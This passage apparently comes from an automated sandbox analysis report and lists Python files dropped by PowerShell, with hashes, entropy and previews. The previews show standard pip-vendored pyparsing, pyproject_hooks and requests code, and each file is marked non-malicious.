                              Preview:# exceptions.py..import re.import sys.import typing..from .util import (. col,. line,. lineno,. _collapse_string_to_ranges,. replaced_by_pep8,.).from .unicode import pyparsing_unicode as ppu...class ExceptionWordUnicode(ppu.Latin1, ppu.Lauser, ppu.LatinB, ppu.Greek, ppu.Cyrillic):. pass..._extract_alphanums = _collapse_string_to_ranges(ExceptionWordUnicode.alphanums)._exception_word_extractor = re.compile("([" + _extract_alphanums + "]{1,16})|.")...class ParseBaseException(Exception):. """base exception class for all parsing runtime exceptions""".. loc: int. msg: str. pstr: str. parser_element: typing.Any # "ParserElement". args: typing.Tuple[str, int, typing.Optional[str]].. __slots__ = (. "loc",. "msg",. "pstr",. "parser_element",. "args",. ).. # Performance tuning: we construct a *lot* of these, so keep this. # constructor as small and fast as possible. def __init__(. self,. pstr: st
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):38646
                              Entropy (8bit):4.656417128130297
                              Encrypted:false
                              SSDEEP:768:8ukgqBqNGJZreajVVlz8DoGQxMntYl8XqDBroDe76Y:8CqgNGJZreajV7zmFSDl8Xqtci
                              MD5:AFA5F059CAF348C09B7C940BDB477F16
                              SHA1:9C5C1546309D245E734F49C2FA0AF6050E992C66
                              SHA-256:059247080F124B4A588A8DF428641373DC36A8C39A2B862967B85CBC76E74E09
                              SHA-512:F61AB3627F105345BDAE9C1EDFE225D648987D424EA0CF76FC50CEF2A5941E5CD05BEACFBE3620F537944812E0627D0D1DD40E004DC69099FA8297C8150E84A6
                              Malicious:false
                              Preview:# helpers.py.import html.entities.import re.import sys.import typing..from . import __diag__.from .core import *.from .util import (. _bslash,. _flatten,. _escape_regex_range_chars,. replaced_by_pep8,.)...#.# global helpers.#.def counted_array(. expr: ParserElement,. int_expr: typing.Optional[ParserElement] = None,. *,. intExpr: typing.Optional[ParserElement] = None,.) -> ParserElement:. """Helper to define a counted list of expressions... This helper defines a pattern of the form::.. integer expr expr expr..... where the leading integer tells how many expr expressions follow.. The matched tokens returns the array of expr tokens as a list - the. leading count token is suppressed... If ``int_expr`` is specified, it should be a pyparsing expression. that produces an integer value... Example::.. counted_array(Word(alphas)).parse_string('2 ab cd ef') # -> ['ab', 'cd'].. # in this parser, the leading integer value is give
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):26692
                              Entropy (8bit):4.204400723970669
                              Encrypted:false
                              SSDEEP:384:GmJUTRSwOjIST4QY67UNkeEbf7CLulGcvb2HgmxbHc/IWhKRz:GmJUTn167Oke0jl1vbOgMY/Ix
                              MD5:502DA695A726CFE3CB2735CC31B56A3E
                              SHA1:BE84B1B49E3828EC37D7F4B2FFE52F7BFC997815
                              SHA-256:F5DCAA43EC373237E6C566C5B7C2843D4E887D77B245DA16A763A0F34DAB5106
                              SHA-512:396E5F5060778AFC4EB9FC8373F6041707E74085A4DD714A8A8734F26635BFE511499642C931DB311E10A268E91E817FC322A5440C9A64FE09BE125C4AFED20E
                              Malicious:false
                              Preview:# results.py.from collections.abc import (. MutableMapping,. Mapping,. MutableSequence,. Iterator,. Sequence,. Container,.).import pprint.from typing import Tuple, Any, Dict, Set, List..str_type: Tuple[type, ...] = (str, bytes)._generator_type = type((_ for _ in ()))...class _ParseResultsWithOffset:. tup: Tuple["ParseResults", int]. __slots__ = ["tup"].. def __init__(self, p1: "ParseResults", p2: int):. self.tup: Tuple[ParseResults, int] = (p1, p2).. def __getitem__(self, i):. return self.tup[i].. def __getstate__(self):. return self.tup.. def __setstate__(self, *args):. self.tup = args[0]...class ParseResults:. """Structured parse results, to provide multiple means of access to. the parsed data:.. - as a list (``len(results)``). - by list index (``results[0], results[1]``, etc.). - by attribute (``results.<results_name>`` - see :class:`ParserElement.set_results_name`).. Example::.. integer = Word(
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, Unicode text, UTF-8 text executable
                              Category:dropped
                              Size (bytes):13488
                              Entropy (8bit):4.1543808981423656
                              Encrypted:false
                              SSDEEP:192:Zz3aqFdLGsdiBvo9NdnzV6SSMj7QT1hsq1aNnm58fyI1hY/rMi5lXSy1+DuT0x:Zz35FWho93L7QTNw1hwrHD+ST0x
                              MD5:090655DAAB366F55D2D0B8BFFEB969B7
                              SHA1:0F2A7BAA07027F68D8A500B4184FE593C2299BDD
                              SHA-256:7899DC834A7CDF39B51533EF33D6AE353EA86AF22F5DA89B9911437F5AA6C246
                              SHA-512:12F5BE3D6C675CD669E4C7A1804540F3E8D2A5E117863FAB0E61E9363AA54EF7E177265D2B95370C2D0769F46982E094CDA9322BD5FE94ED1D4D4EDA4CB9A23B
                              Malicious:false
                              Preview:# testing.py..from contextlib import contextmanager.import typing..from .core import (. ParserElement,. ParseException,. Keyword,. __diag__,. __compat__,.)...class pyparsing_test:. """. namespace class for classes useful in writing unit tests. """.. class reset_pyparsing_context:. """. Context manager to be used when writing unit tests that modify pyparsing config values:. - packrat parsing. - bounded recursion parsing. - default whitespace characters.. - default keyword characters. - literal string auto-conversion class. - __diag__ settings.. Example::.. with reset_pyparsing_context():. # test that literals used to construct a grammar are automatically suppressed. ParserElement.inlineLiteralsUsing(Suppress).. term = Word(alphas) | Word(nums). group = Group('(' + term[...] + ')').. # assert that the '()' characte
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, Unicode text, UTF-8 text executable
                              Category:dropped
                              Size (bytes):10646
                              Entropy (8bit):4.603560836419799
                              Encrypted:false
                              SSDEEP:192:XZ/nCtDWwPb9kcY1beTSxgRMnUM7/eyI+I3ZKJlyoAARXs/HpieVslhNoRC:XRCtD5zigeUM7Wyr6ZME5klYC
                              MD5:C597338A8AB008CD21175E408E19F830
                              SHA1:EF897E3A62B1D972E1DD3525DADF04A6DFE7B791
                              SHA-256:7C03DDB098804456E43C08A1E8D918AF2D1DA63E233EA7A5195325138C16156F
                              SHA-512:F93EB2349DDB5D932D8BCD9F17DF6929BA0ACF644F0FCE2CE8C4F34F682B4DEABBB5F6815A9ABA56651B6A74BF817762484E77D7B0C37B911E620088D4CE244B
                              Malicious:false
                              Preview:# unicode.py..import sys.from itertools import filterfalse.from typing import List, Tuple, Union...class _lazyclassproperty:. def __init__(self, fn):. self.fn = fn. self.__doc__ = fn.__doc__. self.__name__ = fn.__name__.. def __get__(self, obj, cls):. if cls is None:. cls = type(obj). if not hasattr(cls, "_intern") or any(. cls._intern is getattr(superclass, "_intern", []). for superclass in cls.__mro__[1:]. ):. cls._intern = {}. attrname = self.fn.__name__. if attrname not in cls._intern:. cls._intern[attrname] = self.fn(cls). return cls._intern[attrname]...UnicodeRangeList = List[Union[Tuple[int, int], Tuple[int]]]...class unicode_set:. """. A set of Unicode characters, for language-specific strings for. ``alphas``, ``nums``, ``alphanums``, and ``printables``.. A unicode_set is defined by a list of ranges in the Unicode character. set, in a class
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):8670
                              Entropy (8bit):4.52628162624378
                              Encrypted:false
                              SSDEEP:192:6mujyjYUceklDJfctkDB/7kkcNb/IjEoAHukt/nTaj:B8uUIkcOjzXz
                              MD5:98446240BEF4E0F94DD082E933FFC8ED
                              SHA1:D3A1B5E8AC661F741153B0757CE509530F59DDE5
                              SHA-256:BD33334DDC120F257C77F75282AB944DD5A0045A00FD6DF49DFC44243B2C8514
                              SHA-512:02EE65A2FA37B4D7C635E477DBFDE790BE69393DF69F87C743780A314896995827FC00FA3390FF80623D7368BB399344A19670B5716CA2692D3E2D2DC058913B
                              Malicious:false
                              Preview:# util.py.import inspect.import warnings.import types.import collections.import itertools.from functools import lru_cache, wraps.from typing import Callable, List, Union, Iterable, TypeVar, cast.._bslash = chr(92).C = TypeVar("C", bound=Callable)...class __config_flags:. """Internal class for defining compatibility and debugging flags""".. _all_names: List[str] = []. _fixed_names: List[str] = []. _type_desc = "configuration".. @classmethod. def _set(cls, dname, value):. if dname in cls._fixed_names:. warnings.warn(. f"{cls.__name__}.{dname} {cls._type_desc} is {str(getattr(cls, dname)).upper()}". f" and cannot be overridden",. stacklevel=3,. ). return. if dname in cls._all_names:. setattr(cls, dname, value). else:. raise ValueError(f"no such {cls._type_desc} {dname!r}").. enable = classmethod(lambda cls, name: cls._set(name, True)). disable =
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):491
                              Entropy (8bit):4.738310974542705
                              Encrypted:false
                              SSDEEP:12:iRdkQf0RaPpNmJiAiQmlPR/cRfPRM8OepOik3wHNdzmlPMgUfPMqZJR:Ig0pNmTiVPREZPRAepOikAt8PBoPz3R
                              MD5:80C061091A6382818848B1B371DC2EB8
                              SHA1:DF65D428064B7C8E03726669E00C2E42450C227C
                              SHA-256:9027A19B2D146816BDA15303ED9219AE7B307E73F72D767996F9CD2402F92413
                              SHA-512:680DF062D390CF1092B0A13D8FC1013F557C272C26F58C8EBD79A8CF625741705FC7517C47BDF019F866E75D8B9F16A1E0FF44CC1FE462DB6C3C6CE55EF160BA
                              Malicious:false
                              Preview:"""Wrappers to call pyproject.toml-based build backend hooks.."""..from ._impl import (. BackendInvalid,. BackendUnavailable,. BuildBackendHookCaller,. HookMissing,. UnsupportedOperation,. default_subprocess_runner,. quiet_subprocess_runner,.)..__version__ = '1.0.0'.__all__ = [. 'BackendUnavailable',. 'BackendInvalid',. 'HookMissing',. 'UnsupportedOperation',. 'default_subprocess_runner',. 'quiet_subprocess_runner',. 'BuildBackendHookCaller',.].
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):624
                              Entropy (8bit):5.443806485555198
                              Encrypted:false
                              SSDEEP:12:0JSBdxLzRdPziupFP0mlPGUfPXtvnxOs1nXImaFFjaOtCJ6:0J61riupFPhPRPHOk3rOtCg
                              MD5:001FE3ADA336CE682A9839608E13EFFD
                              SHA1:649DA3BABC8C083D76BEA593B79ED84049BA0E31
                              SHA-256:C1F005428F012F5E8D2B27472FB111F9CEE6D36637EE6E390F94AD092B215A41
                              SHA-512:C65399E44868C31AF01D90C1BC85266EFCD97A5D545FD8CB83EE8366CD2149A272B9085EC487DE2BA39BEBC60031DC3BC7625B1B0A854053D0D49A60D36B19C6
                              Malicious:false
                              Preview:........=.Cf..........................8.....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.Z.g.d...Z.y.).z;Wrappers to call pyproject.toml-based build backend hooks.......)...BackendInvalid..BackendUnavailable..BuildBackendHookCaller..HookMissing..UnsupportedOperation..default_subprocess_runner..quiet_subprocess_runnerz.1.0.0).r....r....r....r....r....r....r....N)...__doc__.._implr....r....r....r....r....r....r......__version__..__all__........pC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyproject_hooks/__init__.py..<module>r........s'..........................................r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):385
                              Entropy (8bit):5.234207300386857
                              Encrypted:false
                              SSDEEP:6:rPC1SBHJcyJieMtvlcicdFO4b8un23d6oAreaF5f0aptM3F3Er:u1SBHSy05ui8b8XImaF5f0ajM13i
                              MD5:E55EBF36B7F092C5D0211AD0ED140548
                              SHA1:474182FB37D67E95BF237E16C6F7FE6624F49663
                              SHA-256:38DBB6F730E8FC218B92BAC33EE692AD78CD72AA1AE7F5533FD346F3571646D8
                              SHA-512:0A838B15D5E771D8497B6E1C73D6ECF8241DBD3AD666E2632BA4E46A3A3DEC43E5226411A02D80D1E5D6929949830EB368F5E06952B448111E47C8AA3A9089A8
                              Malicious:false
                              Preview:........=.Cf..........................D.....d.Z.d.d.l.Z.e.j...................d.k\..r.d.d.l.Z.y.d.d.l.m.Z...y.).)...tomllib.....N)...........)...tomli)...__all__..sys..version_infor......pip._vendorr............oC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyproject_hooks/_compat.py..<module>r........s!..........................w........,r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14736
                              Entropy (8bit):5.30768544645491
                              Encrypted:false
                              SSDEEP:384:KHZWAjaI7lEiubTqSlqWcpUU/IfgcYlFVQq1mZHe:KHAnClL52cdQfHqEZ+
                              MD5:1153AFC042824115CBB8296D6DD7ABA6
                              SHA1:D7E30445C0DA81035DD444790C70BC953E9CE1B4
                              SHA-256:99A2194CF344A560F384230488C39FC894BAA5FAC520B5B34462A6008A5DFD3E
                              SHA-512:94E1B0F3BC0609902E649C33E2EF746CEDE91A56CA86CECBD953414309CE62F8F029941E3FE5426A07FE7672EFF856A9DC9FCB999B59A29B7F15A90C0358073E
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d...Z.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d.d...Z.d.d...Z.d...Z...G.d...d.........Z.y.)......N)...contextmanager)...abspath)...join)...STDOUT..check_call..check_output.....)..._in_proc_script_pathc.....................x.....t.........|.d.d...........5.}.t.........j...................|.|.f.i.|.......d.d.d...........y.#.1.s.w...Y.....y.x.Y.w.).N..w..utf-8....encoding)...open..json..dump)...obj..path..kwargs..fs.... .mC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyproject_hooks/_impl.py..write_jsonr........s8.........d.C.'..*....$.a........#.q..#.F..#....$....$....$.s......0...9.c.....................r.....t.........|.d...........5.}.t.........j...................|.........c.d.d.d...........S.#.1.s.w...Y.....y.x.Y.w.).Nr....r....).r....r......load)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):138
                              Entropy (8bit):4.385609497824286
                              Encrypted:false
                              SSDEEP:3:UFoNJJJQJFyCFYTFLCbQWgVHXMoQewMPsWAffDXKqTA8gXRe1+CRK5Pn:U6HJQJFyG+uQNHcoQ34sHfWoMeGn
                              MD5:6D627346B01079D32B8133AE1C9B6E4E
                              SHA1:9141192D3B9BB789D002285A8CBFD788642AACEE
                              SHA-256:6F2E9EBEB627AA48AC88CF8C41CBCE2ACE5B80333394E4A066A44736A7F4E331
                              SHA-512:90E0E380125496F78FCC9DC2AE56892937D1079CBED280B7B02D875058DF172457F519EE7C6CE1C77E2514A45B671D544FD2C58D7187A24C0063981BCEAACEEA
                              Malicious:false
                              Preview:__all__ = ("tomllib",)..import sys..if sys.version_info >= (3, 11):. import tomllib.else:. from pip._vendor import tomli as tomllib.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):11920
                              Entropy (8bit):4.494420623569677
                              Encrypted:false
                              SSDEEP:192:su1MmfbQ8wn3F3FQzUu/89q4gyqfy1ahERxn:su1zbQ8wnJS4u/89q4gyqfy1H
                              MD5:7006214C597EC31BD685C4C7A809EDF7
                              SHA1:1E5A9D8DC86AF078F0C244032DB980B0FD11C34C
                              SHA-256:EB5189C73422A742089E1B8EEBD648E466CD43CD97103501FF51A0E7F2AD5287
                              SHA-512:116B645B6699211DD08E27EC87A2613CF72CF5CDF92F47EAD33FB36CA9BFA72B4EE02222DEE9AA783D83AF074A1932C3E550B8E63825790401D31246534106AC
                              Malicious:false
                              Preview:import json.import os.import sys.import tempfile.from contextlib import contextmanager.from os.path import abspath.from os.path import join as pjoin.from subprocess import STDOUT, check_call, check_output..from ._in_process import _in_proc_script_path...def write_json(obj, path, **kwargs):. with open(path, 'w', encoding='utf-8') as f:. json.dump(obj, f, **kwargs)...def read_json(path):. with open(path, encoding='utf-8') as f:. return json.load(f)...class BackendUnavailable(Exception):. """Will be raised if the backend cannot be imported in the hook process.""". def __init__(self, traceback):. self.traceback = traceback...class BackendInvalid(Exception):. """Will be raised if the backend is invalid.""". def __init__(self, backend_name, backend_path, message):. super().__init__(message). self.backend_name = backend_name. self.backend_path = backend_path...class HookMissing(Exception):. """Will be raised on missing hooks (if a
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):546
                              Entropy (8bit):4.551389317479523
                              Encrypted:false
                              SSDEEP:12:EaZbaCAUTvAsJUxViQg9SViwsgQ095BeA0M5L35Buo1OQ6mLv:9fTv9utiSVxQKn0M5JrTv
                              MD5:44AE0A51F674AF325CF2B1913EE32DB7
                              SHA1:D594EACE41476837A85468E99AF3A31514CFA7C4
                              SHA-256:F604004E9B5B1647A5908CB439F5851000B3AB15C93100D6087F6B04E0195704
                              SHA-512:7A9886DBC641ABED170F179C9CED022665D87159DC90A8FE9014D0E8DD20250548DF80B8687B6439D51EC493BA853BDE088A05848CC72E406E543C3719DF1B0F
                              Malicious:false
                              Preview:"""This is a subpackage because the directory is on sys.path for _in_process.py..The subpackage should stay as empty as possible to avoid shadowing modules that.the backend might import.."""..import importlib.resources as resources..try:. resources.files.except AttributeError:. # Python 3.8 compatibility. def _in_proc_script_path():. return resources.path(__package__, '_in_process.py').else:. def _in_proc_script_path():. return resources.as_file(. resources.files(__package__).joinpath('_in_process.py')).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1091
                              Entropy (8bit):5.0356463341252775
                              Encrypted:false
                              SSDEEP:24:YrNfTv9uudz1s3n6C7kaqkj2tYl5Bq4zo:YrNfpueih1qkyYl5B5c
                              MD5:969908330BF11AC4B62DE11F7B083E0F
                              SHA1:318FC2801D3E1BF12DDD00FADF2154205E6CDDA3
                              SHA-256:9B6DE42BB2625483F11715F035792F2D281F4D5D0D7EDB05A1E2A3900BDC6AD7
                              SHA-512:E514E12979643258749D2C0B62C000E9AB0E30C2094551E8AFB266E57E95D1A601009B1516B30AF81B958E14246BF77A288B03A9249E86659C328A0A951F0E7B
                              Malicious:false
                              Preview:........=.Cf".........................P.....d.Z.d.d.l.m.Z.....e.j.....................d...Z.y.#.e.$.r...d...Z.Y.y.w.x.Y.w.).z.This is a subpackage because the directory is on sys.path for _in_process.py..The subpackage should stay as empty as possible to avoid shadowing modules that.the backend might import.......Nc.....................x.....t.........j...................t.........j...................t.................j...................d.................S...Nz._in_process.py)...resources..as_file..files..__package__..joinpath........|C:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pyproject_hooks/_in_process/__init__.py.._in_proc_script_pathr........s/.......... .. ....O.O.K..(..1..1.2B..C....E.....E.r....c.....................6.....t.........j...................t.........d.........S.r....).r......pathr....r....r....r....r....r........s..........~.~.k.+;..<..<r....)...__doc__..importlib.resourcesr....r....r......AttributeErrorr....r....r......<mod
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14408
                              Entropy (8bit):5.296575156302075
                              Encrypted:false
                              SSDEEP:192:s4Ldtwiw2duY1ZeDMqlJEiJD/x+h3c9ph3G+7X5t4PyGCow:skaMdp144KJbJD/xe3+jG1t1w
                              MD5:FB3D7FB30CC095E27534CEE71298A29C
                              SHA1:FE53EEF7792242F04BD6782BD84E409BE62B60CA
                              SHA-256:946DEE5824499C27D50534EA82D683A6CEEA6129F83FBE66CEBAB042963578A3
                              SHA-512:B2A5A5EE332BDAEB5B6B91B3C92B6FBE6EB48766D2074583335BC504E37D4231188EDEAE9B906F4CD3716CA6644A7A8725030CA9BDE58CDE74BB4637662636CB
                              Malicious:false
                              Preview:........=.Cf.*........................b.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.Z.d...Z.d...Z.d...Z.d$d...Z.d$d...Z.d...Z ..G.d...d.e.........Z!..G.d...d.e.........Z"d ..Z#h.d!..Z$d"..Z%e&d#k(..r...e%..........y.y.)%ag...This is invoked in a subprocess to call the build backend hooks...It expects:.- Command line args: hook_name, control_dir.- Environment variables:. PEP517_BUILD_BACKEND=entry.point:spec. PEP517_BACKEND_PATH=paths (separated with os.pathsep).- control_dir/input.json:. - {"kwargs": {...}}..Results:.- control_dir/output.json. - {"return_val": ...}......N)...glob)...import_module)...joinc.....................x.....t.........|.d.d...........5.}.t.........j...................|.|.f.i.|.......d.d.d...........y.#.1.s.w...Y.....y.x.Y.w.).N..w..utf-8....encoding)...open..json..dump)...obj.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):10927
                              Entropy (8bit):4.737449442563281
                              Encrypted:false
                              SSDEEP:192:mdQeWwXEbynViulapd+jJ/lBR0lJHgCPu+NORhUh0RMzlwUtn8pM:SQ62+Jt0lJnxNOpYtn8a
                              MD5:4D0D470C8151CA2901F01D696E0E3F8B
                              SHA1:B188AAE41334AB7DED5AA1C9C992779FEA0127EB
                              SHA-256:9B66F7E1CF75EC85B9A3E43FE936081E5B0AF6549494D8B2AC84D3507FF3C1EC
                              SHA-512:4BD82327241C5E7F70DF26F92E388C4B284A42CFE1DA085F492EFD862B58522438C877F5E5CF42B318526AEA593BA832CAA1A53836614AE9F28D28724E0FD5E3
                              Malicious:false
                              Preview:"""This is invoked in a subprocess to call the build backend hooks...It expects:.- Command line args: hook_name, control_dir.- Environment variables:. PEP517_BUILD_BACKEND=entry.point:spec. PEP517_BACKEND_PATH=paths (separated with os.pathsep).- control_dir/input.json:. - {"kwargs": {...}}..Results:.- control_dir/output.json. - {"return_val": ...}.""".import json.import os.import os.path.import re.import shutil.import sys.import traceback.from glob import glob.from importlib import import_module.from os.path import join as pjoin..# This file is run as a script, and `import wrappers` is not zip-safe, so we.# include write_json() and read_json() from wrappers.py....def write_json(obj, path, **kwargs):. with open(path, 'w', encoding='utf-8') as f:. json.dump(obj, f, **kwargs)...def read_json(path):. with open(path, encoding='utf-8') as f:. return json.load(f)...class BackendUnavailable(Exception):. """Raised if we cannot import the backend""". def __i
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5169
                              Entropy (8bit):4.874553924231789
                              Encrypted:false
                              SSDEEP:96:7peYVGivM4SAAAmo7146JlABKAF2rrK2As4+A+I+AxQSEsNiZi0Xoy2Psv:7bMS7deeWP1Z1R+Exk/
                              MD5:CB08F1B2F9A15B532E967790852650C1
                              SHA1:A86FD9B261BD085B254467C9B7AE83C0E7E1B7C2
                              SHA-256:A30BA3A1BE1D938E528B2E0462D6C2291EB0705A61EC4D386BFBFF3AE01A7010
                              SHA-512:6F2E92DB6E04F14F945309368C7706A29D6C33F8B68571DD16E13B240EFC3EDA55093821557FA719A5AAC76D3D1BE6B70A60E55331DA949A4C15431A5B991E3B
                              Malicious:false
                              Preview:# __.# /__) _ _ _ _ _/ _.# / ( (- (/ (/ (- _) / _).# /..""".Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2'). >>> r = requests.post('https://httpbin.org/post', data=payload). >>> print(r.text). {. .... "form": {. "key1": "value1",. "key2": "value2". },. .... }..The other HTTP methods are supported - see `requests.api`. Full documentation.is at <https://requests.readthedocs.io>...:copyright: (c) 2017 by Kenneth Reitz..:license: Apache 2.0, see LICENSE for more details.."""..import warnings..from pip._vendor import urllib3..from .exceptions import RequestsDependencyWarning..charset_normalizer_version = None..try:. fro
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5464
                              Entropy (8bit):5.855258953654303
                              Encrypted:false
                              SSDEEP:96:9ynPj0meYVGivMKF/Ih2mpNgSdAho4rsCxwD49bWQXaN4yIoajQ3a2Kpf:9yLjMKmLgSeh59q09vqN7h3a2Kpf
                              MD5:31642365CDDD157E13AB3206E7BBD9FA
                              SHA1:97C7E2CE8B06E578F45FF3BA05B119DBC7E05E98
                              SHA-256:E7D22962A4B2B66778095A34F89B3314677036275C7D60AAFCA368141EEDCFCF
                              SHA-512:BECE064AD330BD5C7255241BF277E4E37ABBA1F4966811E8978726CE5FFF2A581E3460DF1A0C7B2E1879D42B2E5BA5CD076043DC32FBC996733484C9EA62F347
                              Malicious:false
                              Preview:........=.Cf1.........................F.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z...d.d.l.m.Z...d...Z.d...Z.....e.e.j...................e.e.............d.d.l.m.Z...e.s...e.d.............d.d.l.Z...e.e.d.d.........s%d.d.l.m.Z.....e.j.............................d.d.l.m.Z.....e.e...........d.d.l.m.Z.....e.j8..................d.e...........d.d.l.Z.d.d.l.m.Z...d.d.l.m Z m!Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m.Z...d.d.l+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..d.d.l.m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<m=Z=..d.d.l>m?Z?m@Z@mAZA..d.d.lBmCZCmDZD..d.d.lEmFZF....e.j...................eH........j.....................e.....................e.j8..................d.e6d.............y.#.e.$.r...d.Z.Y....-w.x.Y.w.#.e.e.f.$.r2....e.j...................d.j!..................e.j...................e.e.........e...........Y....Nw.x.Y.w.#.e.$.r...d.Z.Y....Fw.x.Y.w.#.e.$.r...Y....#w.x.Y.w.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..B
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):595
                              Entropy (8bit):5.728334734417303
                              Encrypted:false
                              SSDEEP:12:IkzJSsU8ReRyu7msv7SAV5b4StJzcAFAu63WcWjImai9aduDhll:xlPOyqmsvp5TJzcAFAu6pG3/cduN/
                              MD5:F4728F7F4D2BB61B428009871B774250
                              SHA1:233755AA3886E107D195A8932DE8981E65718BA5
                              SHA-256:59922B56AE8EC28BA1685031A60A88EA1F43BAC328B668456E27EFB9A8A1A1AE
                              SHA-512:B7C0559A21C127EF2AE2E860A511BE1EA81EF924BC1C90AE633CD70529965B80457DE1A6E8F40152B8EA9544F46EC01B432C92032983D8ACC1254D092CE4DC1D
                              Malicious:false
                              Preview:........=.Cf..........................,.....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.31.0i.1..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache 2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__........lC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/requests/__version__.py..<module>r........s:.................+....+...................(..........)....%..r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2035
                              Entropy (8bit):5.746432945098865
                              Encrypted:false
                              SSDEEP:48:O0L07mpGWydzx0kxjdqPr1OlX4OXPGddmei8tmgs:HU95UW4pY56dmei8S
                              MD5:C104AF507175C3E27E0BCF4A0609A565
                              SHA1:54351F5163DED2EDA784EF21F05400803D0BD684
                              SHA-256:197F4CE97BD96682EF741A553C8FCFD21C160A814C75172E2E63DAAD912C8E38
                              SHA-512:86AE2B9BBBA5838F4C4C81257BA765124C9448F18DF31990F3A4C21D711C736D70F02B0988FFCF54954EF7FB7E3295B7F4D900A2870A0214051733F7DC9DA208
                              Malicious:false
                              Preview:........=.Cf................................d.Z.d.d.l.Z.d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z.e.e.f.Z.e.e.f.Z.e.e.e.e.i.Z.d.d...Z.d...Z.y.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$c.....................P.....t.........|.t.................r.|.}.|.S.|.j...................|.........}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..outs.... .pC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/re
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):21291
                              Entropy (8bit):5.49898469314577
                              Encrypted:false
